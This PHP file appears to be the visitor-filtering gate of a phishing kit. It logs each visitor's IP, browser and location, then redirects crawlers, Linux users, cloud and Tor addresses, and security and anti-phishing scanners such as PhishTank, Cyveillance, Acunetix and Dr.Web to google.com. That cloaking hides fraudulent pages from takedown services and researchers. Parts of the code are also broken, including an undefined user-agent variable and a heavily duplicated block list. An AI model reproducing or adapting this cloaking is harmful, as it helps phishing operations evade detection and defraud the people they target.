<?php
include("public/_php/init.php");

function getUserIP()
{
	if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
		$_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
		$_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
	}
	$client  = @$_SERVER['HTTP_CLIENT_IP'];
	$forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
	$remote  = $_SERVER['REMOTE_ADDR'];

	if (filter_var($client, FILTER_VALIDATE_IP)) {
		$ip = $client;
	} elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
		$ip = $forward;
	} else {
		$ip = $remote;
	}

	return $ip;
}
$ip = getUserIP();
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
// $ip = getIp();
$data = date("d-m-Y-H:i:s");
$userAgent = getUserAgent();
$sistema = getOS();
$navegador = getBrowser();
$dispositivo = isMobile() ? "MOBILE" : "DESKTOP";
$localizacao = getGeo($ip);
$pais = isset($localizacao) && isset($localizacao->country) ? $localizacao->country : "-";
$estado = isset($localizacao) && isset($localizacao->region) ? $localizacao->region : "-";
$cidade = isset($localizacao) && isset($localizacao->city) ? $localizacao->city : "-";

$bname = 'Unknown';
$platform = 'Unknown';
$version = "";

if (preg_match('/linux/i', $user_agent)) {
	$platform = 'Linux';
} elseif (preg_match('/macintosh|mac os x/i', $user_agent)) {
	$platform = 'Mac';
} elseif (preg_match('/windows|win32/i', $user_agent)) {
	$platform = 'Windows';
}

if (preg_match('/MSIE/i', $user_agent) && !preg_match('/Opera/i', $user_agent)) {
	$bname = 'Internet Explorer';
	$ub = "MSIE";
} elseif (preg_match('/Firefox/i', $user_agent)) {
	$bname = 'Mozilla Firefox';
	$ub = "Firefox";
} elseif (preg_match('/Chrome/i', $user_agent)) {
	$bname = 'Google Chrome';
	$ub = "Chrome";
} elseif (preg_match('/AppleWebKit/i', $user_agent)) {
	$bname = 'AppleWebKit';
	$ub = "Opera";
} elseif (preg_match('/Safari/i', $user_agent)) {
	$bname = 'Apple Safari';
	$ub = "Safari";
} elseif (preg_match('/Netscape/i', $user_agent)) {
	$bname = 'Netscape';
	$ub = "Netscape";
}

$known = array('Version', $ub, 'other');
$pattern = '#(?<browser>' . join('|', $known) . ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#';
if (!preg_match_all($pattern, $user_agent, $matches)) {
}
$i = count($matches['browser']);
if ($i != 1) {
	if (strripos($user_agent, "Version") < strripos($user_agent, $ub)) {
		$version = $matches['version'][0];
	} else {
		$version = $matches['version'][1];
	}
} else {
	$version = $matches['version'][0];
}
if ($version == null || $version == "") {
	$version = "?";
}

$Browser = array(
	'userAgent' => $user_agent,
	'name'      => $bname,
	'version'   => $version,
	'platform'  => $platform,
	'pattern'    => $pattern
);

$navegador = $Browser['name'];
$sistemaAcesso = getOS();
$versao = substr($Browser['version'], 0, 3);

// if ($pais == "Brazil") {
//     $status = "BLOQUEADO";
// }

// $url = "https://blackbox.ipinfo.app/lookup/" . $ip;
// $ch = curl_init();
// curl_setopt($ch, CURLOPT_URL, $url);
// curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
// $resp = curl_exec($ch);
// curl_close($ch);
// $result = $resp;
// if ($result == "Y") {
//     $status = "BLOQUEADO";
// }

// if ($navegador == "Google Chrome" && $versao < "94") {
// 	$status = "BLOQUEADO";
// }
if ($sistemaAcesso == "OS desconhecido") {
	$status = "BLOQUEADO";
}
if ($sistemaAcesso == "Ubuntu" || $sistemaAcesso == "Linux") {
	$status = "BLOQUEADO";
}
if (preg_match('/Googlebot\/|Googlebot-Mobile|Googlebot-Image|Googlebot-News|Googlebot-Video|AdsBot-Google([^-]|$)|AdsBot-Google-Mobile|Feedfetcher-Google|Mediapartners-Google|Mediapartners \(Googlebot\)|APIs-Google|bingbot|Slurp|[wW]get|LinkedInBot|Python-urllib|python-requests|libwww-perl|httpunit|nutch|Go-http-client|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|BIGLOTRON|Teoma|convera|seekbot|Gigabot|Gigablast|exabot|ia_archiver|GingerCrawler|webmon |HTTrack|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|findlink|msrbot|panscient|yacybot|AISearchBot|ips-agent|tagoobot|MJ12bot|woriobot|yanga|buzzbot|mlbot|YandexBot|YandexImages|YandexAccessibilityBot|YandexMobileBot|purebot|Linguee Bot|CyberPatrol|voilabot|Baiduspider|citeseerxbot|spbot|twengabot|postrank|TurnitinBot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|Ahrefs(Bot|SiteAudit)|fuelbot|CrunchBot|IndeedBot|mappydata|woobot|ZoominfoBot|PrivacyAwareBot|Multiviewbot|SWIMGBot|Grobbot|eright|Apercite|semanticbot|Aboundex|domaincrawler|wbsearchbot|summify|CCBot|edisterbot|seznambot|ec2linkfinder|gslfbot|aiHitBot|intelium_bot|facebookexternalhit|Yeti|RetrevoPageAnalyzer|lb-spider|Sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|OrangeBot\/|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|S[eE][mM]rushBot|yoozBot|lipperhey|Y!J|Domain Re-Animator Bot|AddThis|Screaming Frog SEO Spider|MetaURI|Scrapy|Livelap[bB]ot|OpenHoseBot|CapsuleChecker|collection@infegy.com|IstellaBot|DeuSu\/|betaBot|Cliqzbot\/|MojeekBot\/|netEstate NE Crawler|SafeSearch microdata crawler|Gluten Free Crawler\/|Sonic|Sysomos|Trove|deadlinkchecker|Slack-ImgProxy|Embedly|RankActiveLinkBot|iskanie|SafeDNSBot|SkypeUriPreview|Veoozbot|Slackbot|redditbot|datagnionbot|Google-Adwords-Instant|adbeat_bot|WhatsApp|contxbot|pinterest.com.bot|electricmonk|GarlikCrawler|BingPreview\/|vebidoobot|FemtosearchBot|Yahoo Link Preview|MetaJobBot|DomainStatsBot|mindUpBot|Daum\/|Jugendschutzprogramm-Crawler|Xenu Link Sleuth|Pcore-HTTP|moatbot|KosmioBot|pingdom|AppInsights|PhantomJS|Gowikibot|PiplBot|Discordbot|TelegramBot|Jetslide|newsharecounts|James BOT|Bark[rR]owler|TinEye|SocialRankIOBot|trendictionbot|Ocarinabot|epicbot|Primalbot|DuckDuckGo-Favicons-Bot|GnowitNewsbot|Leikibot|LinkArchiver|YaK\/|PaperLiBot|Digg Deeper|dcrawl|Snacktory|AndersPinkBot|Fyrebot|EveryoneSocialBot|Mediatoolkitbot|Luminator-robots|ExtLinksBot|SurveyBot|NING\/|okhttp|Nuzzel|omgili|PocketParser|YisouSpider|um-LN|ToutiaoSpider|MuckRack|Jamie\'s Spider|AHC\/|NetcraftSurveyAgent|Laserlikebot|^Apache-HttpClient|AppEngine-Google|Jetty|Upflow|Thinklab|Traackr.com|Twurly|Mastodon|http_get|DnyzBot|botify|007ac9 Crawler|BehloolBot|BrandVerity|check_http|BDCbot|ZumBot|EZID|ICC-Crawler|ArchiveBot|^LCC |filterdb.iss.net\/crawler|BLP_bbot|BomboraBot|Buck\/|Companybook-Crawler|Genieo|magpie-crawler|MeltwaterNews|Moreover|newspaper\/|ScoutJet|(^| )sentry\/|StorygizeBot|UptimeRobot|OutclicksBot|seoscanners|Hatena|Google Web Preview|MauiBot|AlphaBot|SBL-BOT|IAS crawler|adscanner|Netvibes|acapbot|Baidu-YunGuanCe|bitlybot|blogmuraBot|Bot.AraTurka.com|bot-pge.chlooe.com|BoxcarBot|BTWebClient|ContextAd Bot|Digincore bot|Disqus|Feedly|Fetch\/|Fever|Flamingo_SearchEngine|FlipboardProxy|g2reader-bot|G2 Web Services|imrbot|K7MLWCBot|Kemvibot|Landau-Media-Spider|linkapediabot|vkShare|Siteimprove.com|BLEXBot\/|DareBoost|ZuperlistBot\/|Miniflux\/|Feedspot|Diffbot\/|SEOkicks|tracemyfile|Nimbostratus-Bot|zgrab|PR-CY.RU|AdsTxtCrawler|Datafeedwatch|Zabbix|TangibleeBot|google-xrawler|axios|Amazon CloudFront|Pulsepoint|CloudFlare-AlwaysOnline|Google-Structured-Data-Testing-Tool|WordupInfoSearch|WebDataStats|HttpUrlConnection|Seekport Crawler|ZoomBot|VelenPublicWebCrawler|MoodleBot|jpg-newsbot|outbrain|W3C_Validator|Validator\.nu|W3C-checklink|W3C-mobileOK|W3C_I18n-Checker|FeedValidator|W3C_CSS_Validator|W3C_Unicorn|Google-PhysicalWeb|Blackboard|ICBot\/|BazQux|Twingly|Rivva|Experibot|awesomecrawler|Dataprovider.com|GroupHigh\/|theoldreader.com|AnyEvent|Uptimebot\.org|Nmap Scripting Engine|2ip.ru|Clickagy|Caliperbot|MBCrawler|online-webceo-bot|B2B Bot|AddSearchBot|Google Favicon|HubSpot|Chrome-Lighthouse|HeadlessChrome|CheckMarkNetwork\/|www\.uptime\.com|Streamline3Bot\/|serpstatbot\/|MixnodeCache\/|^curl|SimpleScraper|RSSingBot|Jooblebot|fedoraplanet|Friendica|NextCloud|Tiny Tiny RSS|RegionStuttgartBot|Bytespider|Datanyze|Google-Site-Verification/', $_SERVER['HTTP_USER_AGENT'])) {
	$status = "BLOQUEADO";
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words =
	array(
		"Python/3.8 aiohttp/3.8.3",
		"Python/3.8",
		"aiohttp/3.8.3",
		"bot",
		"above",
		"google",
		"softlayer",
		"amazonaws",
		"cyveillance",
		"phishtank",
		"dreamhost",
		"netpilot",
		"calyxinstitute",
		"tor-exit",
		"apache-httpclient",
		"lssrocketcrawler",
		"crawler",
		"urlredirectresolver",
		"jetbrains",
		"spam",
		"windows 95",
		"windows 98",
		"acunetix",
		"netsparker",
		"007ac9",
		"008",
		"192.comagent",
		"200pleasebot",
		"360spider",
		"4seohuntbot",
		"50.nu",
		"a6-indexer",
		"admantx",
		"amznkassocbot",
		"aboundexbot",
		"aboutusbot",
		"abrave spider",
		"accelobot",
		"acoonbot",
		"addthis.com",
		"adsbot-google",
		"ahrefsbot",
		"alexabot",
		"amagit.com",
		"analytics",
		"antbot",
		"apercite",
		"aportworm",
		"EBAY",
		"CL0NA",
		"jabber",
		"ebay",
		"arabot",
		"hotmail!",
		"msn!",
		"outlook!",
		"outlook",
		"msn",
		"hotmail",
		"abot",
		"dbot",
		"ebot",
		"hbot",
		"kbot",
		"lbot",
		"mbot",
		"nbot",
		"obot",
		"pbot",
		"rbot",
		"sbot",
		"tbot",
		"vbot",
		"ybot",
		"zbot",
		"bot.",
		"bot/",
		"_bot",
		".bot",
		"/bot",
		"-bot",
		":bot",
		"(bot",
		"crawl",
		"slurp",
		"spider",
		"seek",
		"accoona",
		"acoon",
		"adressendeutschland",
		"ah-ha.com",
		"ahoy",
		"altavista",
		"ananzi",
		"anthill",
		"appie",
		"arachnophilia",
		"arale",
		"araneo",
		"aranha",
		"architext",
		"aretha",
		"arks",
		"asterias",
		"atlocal",
		"atn",
		"atomz",
		"augurfind",
		"backrub",
		"bannana_bot",
		"baypup",
		"bdfetch",
		"big brother",
		"biglotron",
		"bjaaland",
		"blackwidow",
		"blaiz",
		"blog",
		"blo.",
		"bloodhound",
		"boitho",
		"booch",
		"bradley",
		"butterfly",
		"calif",
		"cassandra",
		"ccubee",
		"cfetch",
		"charlotte",
		"churl",
		"cienciaficcion",
		"cmc",
		"collective",
		"comagent",
		"combine",
		"computingsite",
		"csci",
		"curl",
		"cusco",
		"daumoa",
		"deepindex",
		"delorie",
		"depspid",
		"deweb",
		"echo blinde kuh",
		"digger",
		"ditto",
		"dmoz",
		"docomo",
		"download express",
		"dtaagent",
		"dwcp",
		"ebiness",
		"ebingbong",
		"e-collector",
		"ejupiter",
		"emacs-w3 search engine",
		"esther",
		"evliya celebi",
		"ezresult",
		"falcon",
		"felix ide",
		"ferret",
		"fetchrover",
		"fido",
		"findlinks",
		"fireball",
		"fish search",
		"fouineur",
		"funnelweb",
		"gazz",
		"gcreep",
		"genieknows",
		"getterroboplus",
		"geturl",
		"glx",
		"goforit",
		"golem",
		"grabber",
		"grapnel",
		"gralon",
		"griffon",
		"gromit",
		"grub",
		"gulliver",
		"hamahakki",
		"harvest",
		"havindex",
		"helix",
		"heritrix",
		"hku www octopus",
		"homerweb",
		"htdig",
		"html index",
		"html_analyzer",
		"htmlgobble",
		"hubater",
		"hyper-decontextualizer",
		"ia_archiver",
		"ibm_planetwide",
		"ichiro",
		"iconsurf",
		"iltrovatore",
		"image.kapsi.net",
		"imagelock",
		"incywincy",
		"indexer",
		"infobee",
		"informant",
		"ingrid",
		"inktomisearch.com",
		"inspector web",
		"intelliagent",
		"internet shinchakubin",
		"ip3000",
		"iron33",
		"israeli-search",
		"ivia",
		"jack",
		"jakarta",
		"javabee",
		"jetbot",
		"jumpstation",
		"katipo",
		"kdd-explorer",
		"kilroy",
		"knowledge",
		"kototoi",
		"kretrieve",
		"labelgrabber",
		"lachesis",
		"larbin",
		"legs",
		"libwww",
		"linkalarm",
		"link validator",
		"linkscan",
		"lockon",
		"lwp",
		"lycos",
		"magpie",
		"mantraagent",
		"mapoftheinternet",
		"marvin/",
		"mattie",
		"mediafox",
		"mediapartners",
		"mercator",
		"merzscope",
		"microsoft url control",
		"minirank",
		"miva",
		"mj12",
		"mnogosearch",
		"moget",
		"monster",
		"moose",
		"motor",
		"multitext",
		"muncher",
		"muscatferret",
		"mwd.search",
		"myweb",
		"najdi",
		"nameprotect",
		"nationaldirectory",
		"nazilla",
		"ncsa beta",
		"nec-meshexplorer",
		"nederland.zoek",
		"netcarta webmap engine",
		"netmechanic",
		"netresearchserver",
		"netscoop",
		"newscan-online",
		"nhse",
		"nokia6682/",
		"nomad",
		"noyona",
		"nutch",
		"nzexplorer",
		"objectssearch",
		"occam",
		"omni",
		"open text",
		"openfind",
		"openintelligencedata",
		"orb search",
		"osis-project",
		"pack rat",
		"pageboy",
		"pagebull",
		"page_verifier",
		"panscient",
		"parasite",
		"partnersite",
		"patric",
		"pear.",
		"pegasus",
		"peregrinator",
		"pgp key agent",
		"phantom",
		"phpdig",
		"picosearch",
		"piltdownman",
		"pimptrain",
		"pinpoint",
		"pioneer",
		"piranha",
		"plumtreewebaccessor",
		"pogodak",
		"poirot",
		"pompos",
		"poppelsdorf",
		"poppi",
		"popular iconoclast",
		"psycheclone",
		"publisher",
		"python",
		"rambler",
		"raven search",
		"roach",
		"road runner",
		"roadhouse",
		"robbie",
		"robofox",
		"robozilla",
		"rules",
		"salty",
		"sbider",
		"scooter",
		"scoutjet",
		"scrubby",
		"search.",
		"searchprocess",
		"semanticdiscovery",
		"senrigan",
		"sg-scout",
		"shai'hulud",
		"shark",
		"shopwiki",
		"sidewinder",
		"sift",
		"silk",
		"simmany",
		"site searcher",
		"site valet",
		"sitetech-rover",
		"skymob.com",
		"sleek",
		"smartwit",
		"sna-",
		"snappy",
		"snooper",
		"sohu",
		"speedfind",
		"sphere",
		"sphider",
		"spinner",
		"spyder",
		"steeler/",
		"suke",
		"suntek",
		"supersnooper",
		"surfnomore",
		"sven",
		"sygol",
		"szukacz",
		"tach black widow",
		"tarantula",
		"templeton",
		"/teoma",
		"t-h-u-n-d-e-r-s-t-o-n-e",
		"theophrastus",
		"titan",
		"titin",
		"tkwww",
		"toutatis",
		"t-rex",
		"tutorgig",
		"twiceler",
		"twisted",
		"ucsd",
		"udmsearch",
		"url check",
		"updated",
		"vagabondo",
		"valkyrie",
		"verticrawl",
		"victoria",
		"vision-search",
		"volcano",
		"voyager/",
		"voyager-hc",
		"w3c_validator",
		"w3m2",
		"w3mir",
		"walker",
		"wallpaper",
		"wanderer",
		"wauuu",
		"wavefire",
		"web core",
		"web hopper",
		"web wombat",
		"webbandit",
		"webcatcher",
		"webcopy",
		"webfoot",
		"weblayers",
		"weblinker",
		"weblog monitor",
		"webmirror",
		"webmonkey",
		"webquest",
		"webreaper",
		"websitepulse",
		"websnarf",
		"webstolperer",
		"webvac",
		"webwalk",
		"webwatch",
		"webwombat",
		"webzinger",
		"wget",
		"whizbang",
		"whowhere",
		"wild ferret",
		"worldlight",
		"wwwc",
		"wwwster",
		"xenu",
		"xget",
		"xift",
		"xirq",
		"yandex",
		"yanga",
		"yeti",
		"yodao",
		"zao/",
		"zippp",
		"zyborg",
		"drweb",
		"Dr.Web",
		"hostinger",
		"scanurl",
		"above",
		"google",
		"facebook",
		"softlayer",
		"amazonaws",
		"cyveillance",
		"phishtank",
		"dreamhost",
		"netpilot",
		"calyxinstitute",
		"tor-exit",
		"bot",
		"above",
		"google",
		"softlayer",
		"amazonaws",
		"cyveillance",
		"compatible",
		"facebook",
		"phishtank",
		"dreamhost",
		"netpilot",
		"calyxinstitute",
		"tor-exit",
		"apache-httpclient",
		"lssrocketcrawler",
		"Trident",
		"X11",
		"Macintosh",
		"crawler",
		"urlredirectresolver",
		"jetbrains",
		"spam",
		"windows 95",
		"windows 98",
		"acunetix",
		"netsparker",
		"google",
		"007ac9",
		"008",
		"192.comagent",
		"200pleasebot",
		"360spider",
		"4seohuntbot",
		"50.nu",
		"a6-indexer",
		"admantx",
		"amznkassocbot",
		"aboundexbot",
		"aboutusbot",
		"abrave spider",
		"accelobot",
		"acoonbot",
		"addthis.com",
		"adsbot-google",
		"ahrefsbot",
		"alexabot",
		"amagit.com",
		"analytics",
		"antbot",
		"apercite",
		"aportworm",
		"arabot",
		"crawl",
		"slurp",
		"spider",
		"seek",
		"accoona",
		"acoon",
		"adressendeutschland",
		"ah-ha.com",
		"ahoy",
		"altavista",
		"ananzi",
		"anthill",
		"appie",
		"arachnophilia",
		"arale",
		"araneo",
		"aranha",
		"architext",
		"aretha",
		"arks",
		"asterias",
		"atlocal",
		"atn",
		"atomz",
		"augurfind",
		"backrub",
		"bannana_bot",
		"baypup",
		"bdfetch",
		"big brother",
		"biglotron",
		"bjaaland",
		"blackwidow",
		"blaiz",
		"blog",
		"blo.",
		"bloodhound",
		"boitho",
		"booch",
		"bradley",
		"butterfly",
		"calif",
		"cassandra",
		"ccubee",
		"cfetch",
		"charlotte",
		"churl",
		"cienciaficcion",
		"cmc",
		"collective",
		"comagent",
		"combine",
		"computingsite",
		"csci",
		"curl",
		"cusco",
		"daumoa",
		"deepindex",
		"delorie",
		"depspid",
		"deweb",
		"die blinde kuh",
		"digger",
		"ditto",
		"dmoz",
		"docomo",
		"download express",
		"dtaagent",
		"dwcp",
		"ebiness",
		"ebingbong",
		"e-collector",
		"ejupiter",
		"emacs-w3 search engine",
		"esther",
		"evliya celebi",
		"ezresult",
		"falcon",
		"felix ide",
		"ferret",
		"fetchrover",
		"fido",
		"findlinks",
		"fireball",
		"fish search",
		"fouineur",
		"funnelweb",
		"gazz",
		"gcreep",
		"genieknows",
		"getterroboplus",
		"geturl",
		"glx",
		"goforit",
		"golem",
		"grabber",
		"grapnel",
		"gralon",
		"griffon",
		"gromit",
		"grub",
		"gulliver",
		"hamahakki",
		"harvest",
		"havindex",
		"helix",
		"heritrix",
		"hku www octopus",
		"homerweb",
		"htdig",
		"html index",
		"html_analyzer",
		"htmlgobble",
		"hubater",
		"hyper-decontextualizer",
		"ia_archiver",
		"ibm_planetwide",
		"ichiro",
		"iconsurf",
		"iltrovatore",
		"image.kapsi.net",
		"imagelock",
		"incywincy",
		"indexer",
		"infobee",
		"informant",
		"ingrid",
		"inktomisearch.com",
		"inspector web",
		"intelliagent",
		"internet shinchakubin",
		"ip3000",
		"iron33",
		"israeli-search",
		"ivia",
		"jack",
		"jakarta",
		"javabee",
		"jetbot",
		"jumpstation",
		"katipo",
		"kdd-explorer",
		"kilroy",
		"knowledge",
		"kototoi",
		"kretrieve",
		"labelgrabber",
		"lachesis",
		"larbin",
		"legs",
		"libwww",
		"linkalarm",
		"link validator",
		"linkscan",
		"lockon",
		"lwp",
		"lycos",
		"magpie",
		"mantraagent",
		"mapoftheinternet",
		"marvin/",
		"mattie",
		"mediafox",
		"mediapartners",
		"mercator",
		"merzscope",
		"microsoft url control",
		"minirank",
		"miva",
		"mj12",
		"mnogosearch",
		"moget",
		"monster",
		"moose",
		"motor",
		"multitext",
		"muncher",
		"muscatferret",
		"mwd.search",
		"myweb",
		"najdi",
		"nameprotect",
		"nationaldirectory",
		"nazilla",
		"ncsa beta",
		"nec-meshexplorer",
		"nederland.zoek",
		"netcarta webmap engine",
		"netmechanic",
		"netresearchserver",
		"netscoop",
		"newscan-online",
		"nhse",
		"nokia6682/",
		"nomad",
		"noyona",
		"nutch",
		"nzexplorer",
		"objectssearch",
		"occam",
		"omni",
		"open text",
		"openfind",
		"openintelligencedata",
		"orb search",
		"osis-project",
		"pack rat",
		"pageboy",
		"pagebull",
		"page_verifier",
		"panscient",
		"parasite",
		"partnersite",
		"patric",
		"pear.",
		"pegasus",
		"peregrinator",
		"pgp key agent",
		"phantom",
		"phpdig",
		"picosearch",
		"piltdownman",
		"pimptrain",
		"pinpoint",
		"pioneer",
		"piranha",
		"plumtreewebaccessor",
		"pogodak",
		"poirot",
		"pompos",
		"poppelsdorf",
		"poppi",
		"popular iconoclast",
		"psycheclone",
		"publisher",
		"python",
		"rambler",
		"raven search",
		"roach",
		"road runner",
		"roadhouse",
		"robbie",
		"robofox",
		"robozilla",
		"rules",
		"salty",
		"sbider",
		"scooter",
		"scoutjet",
		"scrubby",
		"search.",
		"searchprocess",
		"semanticdiscovery",
		"senrigan",
		"sg-scout",
		"shai'hulud",
		"shark",
		"shopwiki",
		"sidewinder",
		"sift",
		"silk",
		"simmany",
		"site searcher",
		"site valet",
		"sitetech-rover",
		"skymob.com",
		"sleek",
		"smartwit",
		"sna-",
		"snappy",
		"snooper",
		"sohu",
		"speedfind",
		"sphere",
		"sphider",
		"spinner",
		"spyder",
		"steeler/",
		"suke",
		"suntek",
		"supersnooper",
		"surfnomore",
		"sven",
		"sygol",
		"szukacz",
		"tach black widow",
		"tarantula",
		"templeton",
		"/teoma",
		"t-h-u-n-d-e-r-s-t-o-n-e",
		"theophrastus",
		"titan",
		"titin",
		"tkwww",
		"toutatis",
		"t-rex",
		"tutorgig",
		"twiceler",
		"twisted",
		"ucsd",
		"udmsearch",
		"url check",
		"updated",
		"vagabondo",
		"valkyrie",
		"verticrawl",
		"victoria",
		"vision-search",
		"volcano",
		"voyager/",
		"voyager-hc",
		"w3c_validator",
		"w3m2",
		"w3mir",
		"walker",
		"wallpaper",
		"wanderer",
		"wauuu",
		"wavefire",
		"web core",
		"web hopper",
		"web wombat",
		"webbandit",
		"webcatcher",
		"webcopy",
		"webfoot",
		"weblayers",
		"weblinker",
		"weblog monitor",
		"webmirror",
		"webmonkey",
		"webquest",
		"webreaper",
		"websitepulse",
		"websnarf",
		"webstolperer",
		"webvac",
		"webwalk",
		"webwatch",
		"webwombat",
		"webzinger",
		"wget",
		"whizbang",
		"whowhere",
		"wild ferret",
		"worldlight",
		"wwwc",
		"wwwster",
		"xenu",
		"xift",
		"xirq",
		"yandex",
		"yanga",
		"yeti",
		"yahoo!",
	);
foreach ($blocked_words as $word) {
	if (substr_count($hostname, $word) > 0) {
		$status = "BLOQUEADO";
	}
}

if ($status == "BLOQUEADO") {
	http_response_code(301);
	header("HTTP/1.1 301 Moved Permanently");
	header("Location: http://www.google.com/");
	exit;
}
